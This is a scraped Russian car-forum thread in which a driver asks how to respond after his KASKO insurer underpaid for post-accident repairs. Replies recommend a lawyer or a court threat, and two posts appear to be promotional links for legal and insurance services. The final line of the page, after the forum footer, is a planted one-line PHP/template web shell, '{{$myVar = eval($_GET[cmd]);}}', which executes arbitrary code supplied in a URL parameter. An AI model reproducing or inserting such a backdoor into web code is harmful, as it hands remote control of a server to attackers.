+ Ответить в теме
Показано с 1 по 5 из 5

Тема: Страховщики не хотят выплачивать полную сумму ремонта авто после ДТП, как быть?


  1. #1
    Новичок Serf is on a distinguished road Аватар для Serf
    Регистрация
    05.04.2019
    Сообщений
    136

    Страховщики не хотят выплачивать полную сумму ремонта авто после ДТП, как быть?

    Попал в ДТП, никто не пострадал серьезно, но автомобиль получил серьезные повреждения. По КАСКО мне должны были почти полностью погасить услуги автосервиса по ремонту автомобиля, однако сумма оказалась далеко не полной. Спорить с страховой компанией трудно, как лучше поступить в этом случае, есть ли смысл подавать в суд? Автомобиль дорогой и крупную сумму не доплатили.
    Последний раз редактировалось Serf; 24.05.2019 в 06:16.

  2. #2
    Вообще я читал что у КАСКО нет никаких ограничений по выплате, что-то мудрят они. Скорее всего вам просто такая страховая попалась, которая не хочет выплачивать полную сумму. Я на вашем месте обратился бы к юристу за консультацией, если он ознакомиться со всеми бумагами и скажет, что страховая неправа, то смело можно подавать в суд.

  3. #3
    Новичок Devid is on a distinguished road Аватар для Devid
    Регистрация
    05.04.2019
    Сообщений
    132
    Я бы пригрозил им судом, серьезно. Как минимум потребовал бы разъяснения в письменном виде, как минимум для консультации с юристом. Они сами себе дороже выплаты делают, так как если вы точно правы, то им придется еще и ваши издержки на юристов и суд компенсировать, что сейчас не дешево в целом.

  4. #4
    Думаю, вам однозначно понадобятся услуги автоюриста, например можете обратиться сюда - http://автоюрист-центр.рф/. Я сам с данной компанией дело не имел пока еще, но у меня остались неразрешенный вопрос по поводу лишения прав и подумываю обратиться к ним за помощью. Если в двух словах - я вынужден был выехать на встречную полосу, что бы избежать ДТП и к счастью избежал, но видимо камера где-то этот маневр зафиксировала и меня ждет суд, который грозиться отнять у меня права. Не знаю как вам, но мне лично без автоюриста не обойтись точно)

  5. #5
    GTI-Racing Ignat is on a distinguished road Аватар для Ignat
    Регистрация
    15.02.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    259
    Ну лично я делал не только осаго но и каско. Заказывал авто каско в Воронеже https://brokerkapital.ru/services/kasko/ в страховом супермаркете "Капитал". Это проверенная страхование компания которая уже давно на рынке. Конкретно у меня даже были уже страховые случаи и никаких проблем с выплатами не было.

+ Ответить в теме

Похожие темы

  1. Осталось после ремонта
    от _Костян_ в разделе Покупка и продажа запчастей
    Ответов: 7
    Последнее сообщение: 13.11.2012, 19:05
  2. нет esp на нвом авто,как быть?
    от Archi в разделе Электрика
    Ответов: 40
    Последнее сообщение: 28.03.2012, 15:02
  3. Цена На Полную Покраску
    от Lina в разделе Кузов
    Ответов: 8
    Последнее сообщение: 04.07.2008, 10:47
  4. Ответов: 0
    Последнее сообщение: 02.09.2007, 07:01
  5. Сколько лошадок должно быть в авто?
    от Merlin в разделе Курилка
    Ответов: 15
    Последнее сообщение: 28.12.2006, 15:40

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}